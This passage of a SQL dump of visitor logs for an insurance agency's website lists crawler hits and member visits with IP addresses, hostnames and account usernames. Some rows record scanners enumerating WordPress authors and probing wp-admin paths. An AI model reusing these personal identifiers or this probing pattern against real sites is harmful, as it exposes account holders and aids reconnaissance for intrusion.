1080','','','','admin','','0','0',0),(10245,'0b_483c6ae9a091dbe6a2dd559acaafe44d','1459287092','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(10248,'0b_483c6ae9a091dbe6a2dd559acaafe44d','1459287093','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(10251,'0b_483c6ae9a091dbe6a2dd559acaafe44d','1459287097','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(10254,'0b_483c6ae9a091dbe6a2dd559acaafe44d','1459287118','75.99.148.62','ool-4b63943e.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','51',0),(10257,'0b_e73bcc49644fcba4134c540883468ccf','1459287142','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(10259,'0b_955931a9df99a41b039dd14ea2f453ec','1459287426','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10260,'0b_955931a9df99a41b039dd14ea2f453ec','1459287427','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10263,'0b_955931a9df99a41b039dd14ea2f453ec','1459287433','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10265,'0b_955931a9df99a41b039dd14ea2f453ec','1459287462','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(10268,'0b_955931a9df99a41b039dd14ea2f453ec','1459287474','108.58.88.178','ool-6c3a58b2.static.optonline.net','/annuity-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(10271,'0b_9e280312dca33ac32de0a0c9bbef5abf','1459287612','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10272,'0b_0ced65402364bff27e024fb33517234b','1459288526','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0','','',0,'FreeBSD','Firefox 5','','','','','','','','0','0',0),(10275,'0b_44fc6d1f1dd4064bb8a26e5267aeff20','1459288620','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5','','',0,'Win7','Firefox 3','us','','','','','','','0','0',0),(10277,'0b_c414cf47f5f799dd5e0252c11d7ea6a6','1459289120','77.222.110.153','pool-77-222-110-153.is74.ru','/','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(10278,'0b_c414cf47f5f799dd5e0252c11d7ea6a6','1459289122','77.222.110.153','pool-77-222-110-153.is74.ru','/?author=1','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(10281,'0b_c414cf47f5f799dd5e0252c11d7ea6a6','1459289123','77.222.110.153','pool-77-222-110-153.is74.ru','/?author=2','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(10283,'0b_2fbc24db97105024e2c6d887a99a1876','1459289135','100.43.81.146','spider-100-43-81-146.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(10286,'0b_1186640367bbdcaf58adbd0435ea7920','1459289492','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10287,'0b_1186640367bbdcaf58adbd0435ea7920','1459289493','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10290,'0b_ea51f676dba70ef3730a0fc22a048a36','1459290790','86.132.215.31','host86-132-215-31.range86-132.btcentralplus.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(10292,'0b_ea51f676dba70ef3730a0fc22a048a36','1459290793','86.132.215.31','host86-132-215-31.range86-132.btcentralplus.com','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(10293,'0b_ea51f676dba70ef3730a0fc22a048a36','1459290794','86.132.215.31','host86-132-215-31.range86-132.btcentralplus.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(10296,'0b_ea51f676dba70ef3730a0fc22a048a36','1459290796','86.132.215.31','host86-132-215-31.range86-132.btcentralplus.com','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(10299,'0b_ea51f676dba70ef3730a0fc22a048a36','1459290798','86.132.215.31','host86-132-215-31.range86-132.btcentralplus.com','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(10301,'0b_b2f83dabf20119b6a97e3b24419df7bf','1459291203','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10304,'0b_b2f83dabf20119b6a97e3b24419df7bf','1459291215','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10305,'0b_b2f83dabf20119b6a97e3b24419df7bf','1459291243','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10307,'0b_f189d58c76dbad88ba41b914da41c9fe','1459291970','75.102.23.105','unknown.hostforweb.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(10308,'0b_286218ada49c6219d3b9d5a9dc96a434','1459292976','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10310,'0b_a2347427e62b4dc4b61646759718cf01','1459293344','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10311,'0b_795294a2b332fce6e934a07b7393494b','1459296134','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10313,'0b_7bcbdbc51ffe58da96d17db12ab2daab','1459297128','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10314,'0b_b532b821511cbc132062578dda85a110','1459299559','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10317,'0b_7a03060ab9b6bec12eda9d10b89e4918','1459303294','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10319,'0b_f46eb873c03a85c0b8b8ac71fcb86356','1459304213','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(10320,'0b_faad2e8d37f9a1b50102a825fad79143','1459304978','209.68.2.98','auddo.pair.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36','','',0,'Win8','Google Chrome','','','','','','','','0','0',0),(10323,'0b_faad2e8d37f9a1b50102a825fad79143','1459304982','209.68.2.98','auddo.pair.com','/?author=1','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36','','',0,'Win8','Google Chrome','','','','','','','','0','0',0),(10325,'0b_faad2e8d37f9a1b50102a825fad79143','1459304983','209.68.2.98','auddo.pair.com','/author/admin/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36','','',0,'Win8','Google Chrome','','','','','','','','0','0',0),(10328,'0b_faad2e8d37f9a1b50102a825fad79143','1459304985','209.68.2.98','auddo.pair.com','/?author=2','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36','','',0,'Win8','Google Chrome','','','','','','','','0','0',0),(10329,'0b_51ac887f2fb56c45474dca02052aaf94','1459305209','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10331,'0b_facc16a08f7a09eb00750e65f8acdcb3','1459310384','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10334,'0b_5f699dd9095fd48ecc4b6e4ebf97c698','1459310414','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10335,'0b_2ff2ab43a9a57681e578f6499f7611e4','1459314439','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10337,'0b_22c5f8fad0800c268eab0b4ad64babe6','1459315337','180.76.15.147','baiduspider-180-76-15-147.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(10340,'0b_9360c77a2b9970d734ccdf86927621f1','1459323571','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10343,'0b_9360c77a2b9970d734ccdf86927621f1','1459324496','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10344,'0b_9360c77a2b9970d734ccdf86927621f1','1459324501','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10346,'0b_55e90680e52e5d7fd7f3e648b8bd6bc1','1459327187','196.46.186.134','sh01-pta.za-dns.com','/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10349,'0b_11dfe3a76162133d562ac61cb8235710','1459327194','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(10350,'0b_add9979fc4a513951dfb1169fabb206b','1459327482','66.249.73.178','crawl-66-249-73-178.googlebot.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10352,'0b_82d2c730951b86f023fc31e03f110917','1459327763','186.202.150.247','hm9212.publiccloud.com.br','/test/wp-admin/','','','',0,'','','br','','','Unknown Spider','','','','0','0',0),(10355,'0b_fdcb712d2dc5be139cbc83a2ba388805','1459328286','212.227.116.35','infong1163.kundenserver.de','/wordpress/wp-admin/','','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(10356,'0b_aafbc227a85832b9507cb6422b7ec115','1459328849','37.46.125.236','nld-net-ip.as51430.net','/blog/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10358,'0b_a5daec324d9465e710bf3295801e376f','1459329859','50.62.176.36','p3plcpnl0509.prod.phx3.secureserver.net','/old/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10361,'0b_b7fcb83c8d4413528446b913035f2dd9','1459337296','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10364,'0b_1457f2b0c6e0871a2384f233a3dc92c0','1459338089','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10367,'0b_223ce4190adcab80a2195ac7622230cf','1459338118','204.79.180.6','204.79.180.6','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.bing.com/search?q=campanion+life+chronic+illness+ider&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','campanion life chronic illness ider',1,'Win7','IE 9','us','','Bing','','','','','0','0',0),(10370,'0b_07fcd2713da77a557008e61996ee7a5c','1459338854','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10371,'0b_07fcd2713da77a557008e61996ee7a5c','1459338864','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10373,'0b_07fcd2713da77a557008e61996ee7a5c','1459338875','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10374,'0b_1e147729961a408c9f5910e2ce702cf6','1459339936','180.76.15.145','baiduspider-180-76-15-145.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(10377,'0b_90daf303635960e470b418385088f7c7','1459343068','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10379,'0b_ce56931ee84abaeabbe1fb55618bf2be','1459343068','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10382,'0b_90daf303635960e470b418385088f7c7','1459343070','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10383,'0b_ce56931ee84abaeabbe1fb55618bf2be','1459343070','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10385,'0b_f8046fc0e581ce42629445ab8b8aac35','1459343468','71.177.184.59','static-71-177-184-59.lsanca.fios.verizon.net','/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(10388,'0b_9db29702857fd84fd4443062e820447c','1459343590','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','3','0',0),(10389,'0b_9db29702857fd84fd4443062e820447c','1459343590','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','3','0',0),(10392,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343601','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','0',0),(10394,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343605','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10395,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343624','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/?a=pwdchange','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10397,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343636','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10398,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343772','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10400,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343773','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','0',0),(10403,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343793','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10404,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343819','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10406,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343820','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','0',0),(10409,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343849','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10410,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343915','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10413,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343915','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','0',0),(10416,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343926','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10418,'0b_0ec5df1e35b50a02f1e73b509e9f5674','1459343938','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/igo/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','shraga','','0','51',0),(10421,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344760','213.239.205.207','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10424,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344763','213.239.205.207','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10425,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344764','213.239.205.207','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10427,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344766','213.239.205.207','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10430,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344769','213.239.205.207','majestic12.co.uk','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10433,'0b_6b11300b3f77853d55b215ff83ca6e39','1459344773','213.239.205.207','majestic12.co.uk','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10434,'0b_e3ce10a9f29ffc349d1edaf60fa8f098','1459344928','180.76.15.5','baiduspider-180-76-15-5.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(10436,'0b_312d4c3379be867cca9014c04ec8bdc9','1459346029','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10437,'0b_611777b2d0edb27d6ed82a259c9c0cf5','1459348292','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10440,'0b_611777b2d0edb27d6ed82a259c9c0cf5','1459348303','66.249.73.178','crawl-66-249-73-178.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10443,'0b_aa4e958a351112f4f4668d4b2fcee9f2','1459349436','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10445,'0b_5378cc2c97eb3d6cd9601e9e03f32709','1459350069','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10446,'0b_5378cc2c97eb3d6cd9601e9e03f32709','1459350072','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10449,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350289','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10452,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350293','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 